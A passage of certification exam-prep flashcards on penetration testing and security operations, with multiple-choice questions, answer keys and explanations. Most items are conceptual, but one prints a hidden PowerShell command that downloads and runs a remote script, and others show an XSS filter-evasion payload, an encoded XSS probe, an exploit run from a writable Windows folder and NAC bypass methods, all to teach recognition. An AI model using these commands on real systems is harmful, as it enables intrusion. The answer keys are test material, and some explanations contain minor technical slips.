OBJ-4.3: While we cannot be certain that any malicious activity is ongoing based solely on this netstat output, the three entries concerning port 53 are suspicious and should be further investigated. Port 53 is used by DNS servers to receive requests, and an employee’s workstation running DNS would be unusual. If the Foreign Address were using port 53, this would indicate the workstation was conducting a normal DNS lookup, but based on the direction of the network traffic, this is not the case. The entry that is listening on port 135 is not suspicious for a Windows workstation since this is used to conduct file sharing across a local Windows-based network with NetBIOS. The two entries from a random high-numbered port to a web server (port 80 and port 443) are normal network traffic. The web server listens on a well-known or reserved port (port 80 and port 443) and then responds to the random high-numbered port chosen by the workstation to conduct two-way communications.

54
Q

You are attempting to prioritize your vulnerability scans based on the data’s criticality. This will be determined by the asset value of the data contained in each system. Which of the following would be the most appropriate metric to use in this prioritization?
A.Cost of acquisition of the system
B.Type of data processed by the system
C.Cost of the hardware replacement of the system
D.Depreciated hardware cost of the system

A

B.Type of data processed by the system

Explanation:
OBJ-5.1: The data’s asset value is a metric or classification that an organization places on data stored, processed, and transmitted by an asset. Different data types, such as regulated data, intellectual property, and personally identifiable information, can determine its value. The cost of acquisition, cost of hardware replacement, and depreciated costs refer to the financial value of the hardware or system itself. This can be significantly different from the value of the information and data that the system stores and processes.

55
Q
You are conducting a penetration test and planning to use a cross-site scripting attack. During your reconnaissance, you determined that the system performs input validation using REGEX to prevent any strings that contain the term "[Ss][Cc][Rr][Ii][Pp][Tt]" in the input. To bypass this input validation, which of the following variations of the script tag should you utilize?
A.
B.
C.<%53CRIPT>
D.<$script>
A

C.<%53CRIPT>

Explanation:
OBJ-3.4: Since cross-site scripting (XSS) relies on the script HTML tag to launch, the system administrators had a good idea in creating input validation using a REGEX for that keyword. Unfortunately, they forgot to include a more inclusive version of this REGEX to catch all variants. For example, simply using [Ss][Cc][Rr][Ii][Pp][Tt] would have been much more secure, but even this would miss %53CRIPT, which would evade this filter. To catch all the letter S variants, you would need to use [%53%%73Ss], which includes the capital S in hex code, the lower case s in hex code, the capital S, and the lowercase s. As a penetration tester, it is important to remember that you can evade weak input validation using ASCII encoded characters, like %53 for the S character. As a cybersecurity analyst, you must build good input validations into your systems to prevent these types of attacks.

56
Q
A company is implementing enhanced user authentication for system administrators accessing the company's confidential servers. They intend to use two-factor authentication to accomplish this. Which of these BEST represents two-factor authentication?
A.Username and password
B.ID Badge and Keys
C.Fingerprint scanner and retina scan
D.Password and key fob
A

D.Password and key fob

Explanation:
OBJ-5.3: Two-factor authentication requires 2 out of 3 of the following: something you know, something you have, something you are. Therefore, the only correct answer is a password (something you know) and a key fob (something you have).

57
Q

A supplier needs to connect several laptops to an organization’s network as part of their service agreement. These laptops will be operated and maintained by the supplier. Victor, a cybersecurity analyst for the organization, is concerned that these laptops could contain some vulnerabilities that could weaken the network’s security posture. What can Victor do to mitigate the risk to other devices on the network without having direct administrative access to the supplier’s laptops?
A.Increase the encryption level of the VPN used by the laptops
B.Scan the laptops for vulnerabilities and patch them
C.Implement a jumpbox system
D.Require 2FA (two factor authentication) on the laptops

A

C.Implement a jumpbox system

Explanation:
OBJ-5.3: A jumpbox is a system on a network used to access and manage devices in a separate security zone. This would create network segmentation between the supplier’s laptops and the rest of the network to minimize the risk. A jumpbox system is a hardened and monitored device that spans two dissimilar security zones and provides a controlled means of access between them. While the other options listed are all good security practices, they do not fully mitigate the risk that insecure systems pose, since Victor cannot enforce these configurations on a supplier-provided laptop. Instead, he must find a method of segmenting the laptops from the rest of the network, either physically, logically, using an airgap, or using a jumpbox.

58
Q

You have been contracted to conduct a penetration test on a regional hospital chain to validate their compliance with industry standards. Which of the following should you scan for when performing this compliance-based assessment? (Select TWO)
A.Cookie manipulation on the client’s web browser
B.Cleartext credentials in LDAP
C.Data at rest improperly configured on the database
D.Tailgating or piggybacking into the waiting room
E.Lack of digital code signing
F.PHI being transmitted over HTTP

A

C.Data at rest improperly configured on the database
F.PHI being transmitted over HTTP

Explanation:
OBJ-1.4: While all of these may pose valid threats, this scenario is conducting a compliance-based assessment. Since this organization is a hospital, it falls under the health care industry. Health care is regulated in terms of patient privacy and the protection of their records. Therefore, your assessment should prioritize the PHI (personal health information) data being insecurely transmitted over HTTP and the database not properly protecting data at rest.

59
Q

An analyst’s vulnerability scanner did not have the latest set of signatures installed. Due to this, several unpatched servers may have vulnerabilities that were undetected by their scanner. You have directed the analyst to update their vulnerability scanner with the latest signatures at least 24 hours before conducting any scans. However, the results of their scans still appear to be the same. Which of the following logical controls should you use to address this situation?
A.Ensure the analyst manually validates that the updates are being performed as directed
B.Configure the vulnerability scanners to run in credentialed mode
C.Test the vulnerability remediation in a sandbox before deploying them into production
D.Create a script to automatically update the signatures every 24 hours

A

D.Create a script to automatically update the signatures every 24 hours

Explanation:
OBJ-2.2: Since the analyst appears not to be installing the latest vulnerability signatures according to your instructions, it would be best to create a script and automate the process to eliminate human error. The script will always ensure that the latest signatures are downloaded and installed in the scanner every 24 hours without any human intervention. While you may want the analyst to manually validate that the updates were performed as part of their procedures, this is still error-prone and likely not to be conducted properly. Regardless of whether the scanners are being run in uncredentialed or credentialed mode, they will still miss vulnerabilities if using out-of-date signatures. Finally, the option to test the vulnerability remediations in a sandbox is a good suggestion. Still, it won’t solve this scenario since we are concerned with the scanning portion of vulnerability management and not remediation.

60
Q
What nmap switch would you use to determine which UDP ports are open on a targeted network?
A.-sN
B.-sS
C.-sP
D.-sU
A

D.-sU

Explanation:
OBJ-4.1: In nmap, the -sU flag is used to scan UDP ports. The -sS flag will only scan TCP ports using a SYN scan. The -sP flag is a legacy (and deprecated) option for a ping scan. The -sN flag is used to conduct a TCP NULL scan.

61
Q
You have been researching WPA2 and just discovered a new vulnerability in its implementation in a popular SOHO access point. You have created a harmless exploit to demonstrate the vulnerability and published it to a cybersecurity blog. You did not provide the details of exactly how your exploit works but have told others they need to update their access point's firmware to version 10.2 to mitigate this vulnerability. Which of the following techniques did you use in this scenario?
A.Exploit chaining
B.Cross-compiling code
C.Exploit Modification
D.Proof of concept
A

D.Proof of concept

Explanation:
OBJ-2.4: In this scenario, the only one of these techniques we know was used for certain is a proof of concept. A proof of concept is a benign exploit developed to highlight vulnerabilities in a system or product. Usually, a proof of concept is developed by security researchers to demonstrate a flaw or vulnerability in a widely used system, software, hardware, or protocol. The technical details may not be initially published until the researcher can provide the information to the companies affected, and they can release a patch. Other times, the security researchers will provide all the details in their security blogs so that both defenders and attackers know the exploit’s details.

62
Q

Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend?
A.Delay the remediation until the next major update of the SQL server occurs
B.Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability
C.Wait until the next scheduled maintenance window to remediate the vulnerability
D.Remediate the vulnerability immediately

A

B.Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability

Explanation:
OBJ-5.3: Jorge should recommend that an emergency maintenance window be scheduled for an off-peak time later in the day. Since the vulnerability is critical, it needs to be remediated or mitigated as quickly as possible, but this also needs to be balanced against the business and operational needs. Therefore, we cannot simply remediate it immediately, as this would cause downtime for this public-facing server. It is also unreasonable to accept the risk until the next scheduled maintenance window since it is a critical vulnerability. Therefore, the best way to balance the risk of the vulnerability against the risk of the outage is to schedule an emergency maintenance window and patch the server during that time.

63
Q
Lamont is in the process of debugging a software program. As he examines the code, he discovers that it is miswritten. Due to the error, the code does not validate a variable's size before allowing the information to be written into memory. Based on Lamont’s discovery, what type of attack might occur?
A.SQL Injection
B.Buffer Overflow
C.Malicious Logic
D.Cross-site scripting
A

B.Buffer Overflow

Explanation:
OBJ-3.4: A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can cause an overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common security attack on data integrity. In buffer overflow attacks, the extra data may contain code designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user’s files, change data, or disclose confidential information. To prevent this type of attack, programs should validate the variable’s size before writing the data to memory, to ensure that the variable can fit into the buffer.

64
Q
You are conducting a wireless penetration test against an organization. During your attack, you created an evil twin of their wireless network. Many of the organization's laptops are now connected to your evil twin access point. Which of the following exploits should you utilize next to gather credentials from the victims browsing the internet through your access point?
A.Karma attack
B.Deauthentication attack
C.Fragmentation attack
D.Downgrade attack
A

D.Downgrade attack

Explanation:
OBJ-3.3: A downgrade attack forces a client to use a weaker SSL version that the attacker can crack. Since the devices are connected through your access point, you can establish a weaker SSL-based HTTPS connection between their web browser and the actual web server they wanted. This forcing of the client to use a weaker version is known as a downgrade attack, and it allows the attacker to capture the packets and later crack them offline since SSL-based HTTPS is weak enough to crack due to vulnerabilities in its design.

65
Q

Dion Training Solutions has just installed a backup generator for their offices that uses SCADA/ICS for remote monitoring of the system. The generator’s control system has an embedded cellular modem that periodically connects to the generator’s manufacturer to provide usage statistics. The modem is configured for outbound connections only, and the generator has no data connection with any of Dion Training’s other networks. The manufacturer utilizes data minimization procedures and uses the data to recommend preventative maintenance service and ensure maximum uptime and reliability by identifying parts that need to be replaced. Which of the following cybersecurity risks is being assumed in this scenario?
A.There is medium risk being assumed since the manufacturer could use the data for purposes other than originally agreed upon
B.There is a critical risk being assumed since the cellular modem represents a threat to the enterprise network if an attack exploits the generator and then pivots to the production environment
C.There is high risk being assumed since the presence of a cellular modem could allow an attacker to remotely disrupt the generator
D.There is minimal risk being assumed since the cellular modem is configured for outbound connection only

A

D.There is minimal risk being assumed since the cellular modem is configured for outbound connection only

Explanation:
OBJ-2.5: There is minimal risk being assumed in this scenario since the cellular modem is configured for outbound connections only. This also minimizes the risk of an attacker gaining remote access to the generator. The generator is logically and physically isolated from the rest of the enterprise network, so even if an attacker could exploit the generator, they could not pivot into the production network. While there is a risk of the manufacturer using the data for purposes other than originally agreed upon, this is a minimal risk due to the manufacturer’s data minimization procedures and the type of data collected. Should the manufacturer choose to use usage statistics about the generator for some other purpose, it would have a negligible impact on the company since it does not contain any PII or proprietary company data.

66
Q
An attacker has been collecting credit card details by calling victims and using false pretexts to trick them. Which of the following types of attack is being conducted?
A.Vishing
B.Phishing
C.Spear Phishing
D.Whaling
A

A.Vishing

Explanation:
OBJ-3.1: Vishing uses a phone call to conduct information gathering and phishing type of actions.

67
Q

You have run a vulnerability scan and received the following output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
CVE-2011-3389
QID 42366 - SSLv3.0/TLSv1.0 Protocol weak CBC mode Server side vulnerability
Check with: openssl s_client -connect login.diontraining.com:443 - tls -cipher “AES:CAMELLISA:SEED:3DES:DES”
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following categories should this be classified as?
A.Web application cryptography vulnerability
B.VPN tunnel vulnerability
C.Active Directory encryption vulnerability
D.PKI transfer vulnerability

A

A.Web application cryptography vulnerability

Explanation:
OBJ-3.4: This vulnerability should be categorized as a web application cryptographic vulnerability. This is shown by the weak SSLv3.0/TLSv1.0 protocol being used in cipher block chaining (CBC) mode. Specifically, the use of the 3DES and DES algorithms during negotiation is a significant vulnerability. A stronger configuration should be used, such as forcing the use of AES.

68
Q
While investigating a data breach, you discover that the account credentials used belonged to an employee who was fired several months ago for misusing company IT systems. Apparently, the IT department never deactivated the employee's account upon their termination. Which of the following categories would this breach be classified as?
A.Insider threat
B.Zero-day
C.Known threat
D.Advanced persistent threat
A

A.Insider threat

Explanation:
OBJ-1.3: An insider threat is any current or former employee, contractor, or business partner who has or had authorized access to an organization’s network, system, or data and intentionally exceeded or misused that access in a manner that negatively affected the confidentiality, integrity, or availability of the organization’s information or information systems. Based on the details provided in the question, it appears the employee’s legitimate credentials were used to conduct the breach. This would be classified as an insider threat. A zero-day is a vulnerability in software unpatched by the developer or an attack that exploits such a vulnerability. A known threat is a threat that can be identified using a basic signature or pattern matching. An advanced persistent threat (APT) is an attacker with the ability to obtain, maintain, and diversify access to network systems using exploits and malware.

69
Q
What system contains a publicly available set of databases with registration contact information for every domain name on the Internet?
A.IETF
B.IANA
C.CAPTCHA
D.WHOIS
A

D.WHOIS

Explanation:
OBJ-2.1: WHOIS is a query and response protocol widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system. WHOIS is also used for a broader range of information. The protocol stores and delivers database content in a human-readable format and is publicly available for use. The Internet Assigned Numbers Authority (IANA) is a standards organization that oversees global IP address allocation, autonomous system number allocation, root zone management in the Domain Name System, media types, and other Internet Protocol-related symbols and Internet numbers. A CAPTCHA is a type of challenge-response test used in computing to determine whether the user is human. The Internet Engineering Task Force (IETF) is an open standards organization that develops and promotes voluntary Internet standards, particularly the standards that comprise the Internet protocol suite.

70
Q
What must be developed to show security improvements over time?
A.Reports
B.Testing Tools
C.Taxonomy of vulnerabilities
D.Metrics
A

D.Metrics

Explanation:
OBJ-5.1: Metrics are a method of measuring something over time. If you wish to show the effect of security improvements over time, creating metrics would be a good option. For example, you may wish to look at the number of unpatched and known vulnerabilities. As this number decreases, your network would be considered to have improved security. Reports and testing tools alone cannot show progress. You must have measurable results using metrics.

71
Q

You are preparing for the exploitation of Dion Training’s systems as part of a penetration test. During your research, you determined that Dion Training is using application containers for each of their websites. You believe that these containers are all hosted on the same physical underlying server. Which of the following components should you attempt to exploit to gain access to all of the websites at once?
A.Configuration files
B.Their e-commerce website’s web application
C.Hypervisor vulnerabilities
D.Common Libraries

A

D.Common Libraries

Explanation:
OBJ-2.5: Application containers are virtualized environments designed to package and run a single computing application or service and share the same host kernel. Since they share the same host kernel, they use common libraries, as well. If you can exploit the common libraries, you will gain access to every website on that server, even if they are in an application container. An application container does not use a hypervisor like a typical virtual machine. Configuration files are unique to each application container. The e-commerce website’s web application is likely hosted in a single application container and, therefore, would not provide you access to every website simultaneously if exploited.

72
Q

What problem can you solve by using Wireshark?
A.Performing packet captures and analysis on a network
B.Tracking source code version changes
C.Resetting the administrator password on three different servers
D.Validating the creation dates of webpages on a server

A

A.Performing packet captures and analysis on a network

Explanation:
OBJ-4.2: Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. It cannot perform any of the other three options.

73
Q
You are working as part of a penetration testing team targeting Dion Training's mobile device software. Which of the following tools would NOT be helpful while trying to exploit their mobile applications?
A.APKX
B.Androzer
C.APK Studio
D.Dirbuster
A

D.Dirbuster

Explanation:
OBJ-4.2: Dirbuster is a brute force tool included with Kali Linux that exposes directories and file names on web and application servers. Androzer is a security testing framework for Android apps and devices. APKX (Android Package Kit) is a Python wrapper for dex converters and Java decompilers included in the OWASP Mobile Testing Guide. APK Studio is a cross-platform IDE for reverse engineering Android applications.

74
Q
Which of the following Nmap commands would scan DionTraining.com and probe any open ports to determine the versions of the running services on those ports?
A.nmap -sT DionTraining.com
B.nmap -sV DionTraining.com
C.nmap -sS DionTraining.com
D.nmap -sL DionTraining.com
A

B.nmap -sV DionTraining.com

Explanation:
OBJ-4.1: The -sV option will scan the target by probing all the open ports to determine the service version they are running. The -sS option will scan the target using a TCP SYN packet and conduct a half-open scan. The -sT option will scan the target by conducting a full TCP 3-way handshake. The -sU option will scan the target by conducting a UDP scan.

75
Q

You are working at the service desk as a network security technician and just received the following email from an end-user who believes a phishing campaign is being attempted.

From: user@diontraining.com
To: abuse@diontraining.com
Subject: You won a free iPhone!

Dear Susan,

You have won a brand new iPhone!

Just click the following link to provide your address so we can ship it out to you this afternoon: (http://www.freephone.io:8080/winner.php)

What should you do to prevent any other employees from accessing the link in the email above while still allowing them access to any other webpages at the domain freephone.io?
A.Add DENY IP ANY ANY EQ 8080 to the IPS filter
B.Add http://www.freephone.io:8080/winner.php to the load balancer
C.Add DENY TCP http://www.freephone.io ANY EQ 8080 to the firewall ACL
D.Add http://www.freephone.io:8080/winner.php to the browser’s group policy block list

A

D.Add http://www.freephone.io:8080/winner.php to the browser’s group policy block list

Explanation:
OBJ-5.3: There are two ways to approach this question. First, you can consider which is the right answer (if you know it). By adding the full URL of the phishing link to the browser’s group policy block list (or black hole list), the specific webpage will be blocked from being accessed by the employees while allowing the rest of the freephone.io domain to be accessible. Now, why not just block the entire domain? Well, maybe the rest of the domain isn’t suspect, but just this one page is. (For example, maybe someone is using a legitimate site like GitHub to host their phishing campaign. Therefore you only want to block their portion of GitHub.) The second approach to answering this question would be to rule out the incorrect answers. If you used DENY TCP to the firewall ACL answer, you would block all access to the domain, blocking legitimate traffic as well as possible malicious activity. If you used the DENY IP ANY ANY to filter traffic at the IPS, you would block any IP traffic to ANY website over port 8080. If you added the link to the load balancer, this would not block it either. Therefore, we are only left with the correct answer of using a group policy in this case.

76
Q

You are analyzing the logs of a web server and see the following entry:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
192.168.1.25 - - [05/Aug/2020:15:16:42 -0400] "GET /%27%27;!--%22%3CDION%3E=&{()} HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070812 Ubuntu/19.04 (disco dingo) Firefox/3.0.12"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this entry, which of the following attacks was attempted?
A.SQL Injection
B.XML Injection
C.Buffer Overflow
D.XSS
A

D.XSS

Explanation:
OBJ-3.4: This is an example of an XSS attack as recorded by a web server’s log. In this example, the XSS attack was obfuscated by the attacker using HTML encoding. The encoding of %27%27 translates to two single quote marks (‘ ‘). While you don’t need to be able to decode the exact string used in the logs, when you see HTML encoding on the exam, it is usually going to be an XSS attack unless you see SQL or XML statements in the string, and in this case there are neither of those. Cross-site scripting (XSS) attacks use a specially crafted URL that includes attack code that will cause user information entered into their web browser to be sent to the attacker. An attacker finds a web server vulnerable to XSS and sends a legitimate-looking URL with XSS attack code appended to the end of the URL through a phishing email or other message to trick the user into clicking the link. A buffer overflow attempts to write data to a buffer that overruns the buffer’s boundary and writes data into the adjacent memory locations, which is not occurring in this example.

77
Q
You are working as part of a penetration testing team during an assessment of Dion Training's headquarters. Your boss has requested that you search the company's recycling bins for any information that might be valuable during the reconnaissance phase of your attack. What type of social engineering method are you performing?
A.Phishing
B.Whaling
C.Dumpster diving
D.Impersonation
A

C.Dumpster diving

Explanation:
OBJ-3.1: Dumpster diving involves searching through publicly accessible garbage cans or recycling bins to find discarded paper, manuals, or other valuable types of information from a targeted company. This is often done as part of the reconnaissance phase before an attack is performed.

78
Q

A penetration tester issued the following command on a victimized Windows system:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
c:\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://diontraining.com/updates')
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this command, which of the following exploits is the penetration tester MOST likely trying to conduct?

A.Exploiting an unquoted service path
B.Download and execute a remote script
C.Conduct a DLL hijacking
D.Scheduling a task for persistence

A

B.Download and execute a remote script

Explanation:
OBJ-4.4: This command executes the PowerShell environment without loading the PowerShell profile (-nop) and in a hidden window (-w hidden). The command that powershell.exe runs is shown after the -c, which stands for executing a command or script block and then exiting. That command creates a new web client object, downloads the content located at the URL provided, and passes it to Invoke-Expression (IEX). This content could be malicious, and if it is another PowerShell script, it will be executed as soon as it is downloaded.

79
Q
You are planning an engagement with a new client. Which target type should be selected to test the organization's physical security using social engineering techniques like dumpster diving, tailgating, and piggybacking?
A.Off-site
B.Third-party hosted
C.On-site
D.External
A

C.On-site

Explanation:
OBJ-1.3: An on-site target type means that assets can be accessed physically where the attack is carried out. To conduct the attack, the attacker must be physically at the location. If the penetration test seeks to determine if an attacker could access their secure server room, an on-site target type would be required.

80
Q
Which type of threat actor can accidentally or inadvertently cause a security incident in your organization?
A.Organized Crime
B.APT
C.Insider Threat
D.Hacktivist
A

C.Insider Threat

Explanation:
OBJ-1.3: An insider threat is a type of threat actor assigned privileges on the system that cause an intentional or unintentional incident. Insider threats can be used as unwitting pawns of external organizations or make crucial mistakes that can open up exploitable security vulnerabilities. Hacktivists, organized crime, and advanced persistent threat (APT) entities do not accidentally or unwittingly target organizations. Instead, their actions are deliberate in nature. A hacktivist is an attacker that is motivated by a social issue or political cause. Organized crime is a type of threat actor that uses hacking and computer fraud for commercial gain. An advanced persistent threat (APT) is a type of threat actor who can obtain, maintain, and diversify access to network systems using exploits and malware.

81
Q
Which attack method is MOST likely to be used by a malicious employee or insider trying to obtain another user's passwords?
A.Phishing
B.Shoulder surfing
C.Man-in-the-middle
D.Tailgating
A

B.Shoulder surfing

Explanation:
OBJ-3.1: While a malicious employee or insider could use all of the methods listed to obtain another user’s passwords, shoulder surfing is the MOST likely to be used. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim’s shoulder. Since a malicious employee or insider can work close to their victims (other users), they could easily use this technique to collect the victimized users’ passwords.

82
Q

You are planning to exploit a network-based vulnerability against an organization as part of a penetration test. You attempted to connect your laptop to a port in their conference room. You were redirected to a captive portal for not meeting the organization’s approved security baseline for a Windows 10 laptop. Which of the following types of exploits should you use to bypass NAC and access the network?
A.Perform a remote code execution on the NAC controller
B.Harvest the user credentials of an employee and use those to connect
C.Conduct a denial of service attack against the network policy server
D.Spoof the MAC address of the room's VoIP phone to your laptop

A

D.Spoof the MAC address of the room's VoIP phone to your laptop

Explanation:
OBJ-3.2: Network access control (NAC) is used to prevent unhealthy devices from accessing an organization’s internal network. To break into a network that uses NAC, you must perform a NAC bypass attack. One popular NAC bypass method is to spoof the MAC or IP address of a printer or VoIP device, since these devices cannot natively participate in NAC and are often whitelisted by administrators. Another method is to configure your attacking device to use IPv6 instead of IPv4. Most routers and switches support IPv4 and IPv6, but many system administrators only configure NAC for their IPv4 devices out of habit. The final method would be to set up a rogue wireless access point to create a man-in-the-middle condition. This would allow an authorized device to connect to your wireless access point and then use its authorized status to connect to the network.

83
Q
Dion Training Solutions is conducting a penetration test of its facilities. The penetration testing team has been augmented by an employee of the company who has general user privileges. The security staff is unaware of the testing. According to NIST, which of the following types of penetration tests is being conducted?
A.An overt external test
B.A covert internal test
C.A covert external test
D.An overt internal test
A

B.A covert internal test

Explanation:
OBJ-1.3: This is considered an internal covert test. It is internal because an employee of the company is part of the team and provides it with general user privileges. This will simulate an insider threat attack. It is also considered covert because the security staff and system administrators are unaware of the ongoing test.

84
Q

Jason is conducting a penetration test against an organization’s Windows network. This engagement aims to demonstrate what a trusted insider could do to the organization’s network. The organization provided Jason with a corporate laptop and a standard user account as an entry-level employee. He was able to download his exploit (exploit.exe) and some programs from SysInternals to his desktop. He then enters the following commands into the command shell from this standard user account:

-=-=-=-=-=-
C:\Users\jason\Desktop> exploit.exe
This program has been blocked by group policy. Contact your administrator to enable this program.

C:\Users\jason\Desktop> accesschk.exe -wsqud Users c:\Windows
rw c:\Windows\Temp
rw c:\Windows\Tracing
rw c:\Windows\Branding

C:\Users\jason\Desktop> copy exploit.exe c:\Windows\Branding
C:\Users\jason\Desktop> ....\Windows\Branding\exploit.exe

Exploit (v0.1) loading…
exploit(shell)>
-=-=-=-=-=-

Based on the output above, which of the following types of vulnerabilities was exploited?
A.Writable service
B.Unquoted service paths
C.Insecure file/folder permissions
D.Insecure sudo
A

C.Insecure file/folder permissions

Explanation:
OBJ-3.5: In this example, Jason used the accesschk program to determine which folders had write access for the Users group within the Windows directory. When he found three that had insecure file/folder permissions, he copied his exploit to one of those folders (c:\Windows\Branding) and then ran it from that location. Based on the results, it appears he was successful. This is likely due to the system administrator only blocking untrusted programs from running from the Desktop, rather than restricting execution everywhere on the system.

85
Q

(Sample Simulation – On the real exam for this type of question, you would have access to the log files to determine which server on a network might have been affected, and then choose the appropriate actions.) A cybersecurity analyst has determined that an attack has occurred against your company’s network. Fortunately, your company uses a good logging system with a centralized Syslog server, so all the logs are available, collected, and stored properly. According to the cybersecurity analyst, the logs indicate that the database server was the only company server on the network that appears to have been attacked. The network is a critical production network for your organization. Therefore, you have been asked to choose the LEAST disruptive actions on the network while performing the appropriate incident response actions. Which actions do you recommend as part of the response efforts?
A.Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the affected server and maintain the chain of custody
B.Immediately remove the database server from the network, create an image of its hard disk and maintain the chain of custody
C.Isolate the affected server from the network immediately, format the database server, reinstall from a known good backup
D.Conduct a system restore of the database server, image the hard drive and maintain the chain of custody

A

A.Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the affected server and maintain the chain of custody

Explanation:
OBJ-5.3: Since the database server is part of a critical production network, it is important to work with the business to time the remediation period to minimize productivity losses. You can immediately begin to capture network traffic since this won’t affect the database server or the network (least intrusive) while scheduling a period of downtime in which to take a forensic image of the database server’s hard drive. All network captures and the hard drive should be maintained under the chain of custody if needed for criminal prosecution or civil action after remediation. The server should be remediated and brought back online once the hard drive image has been created.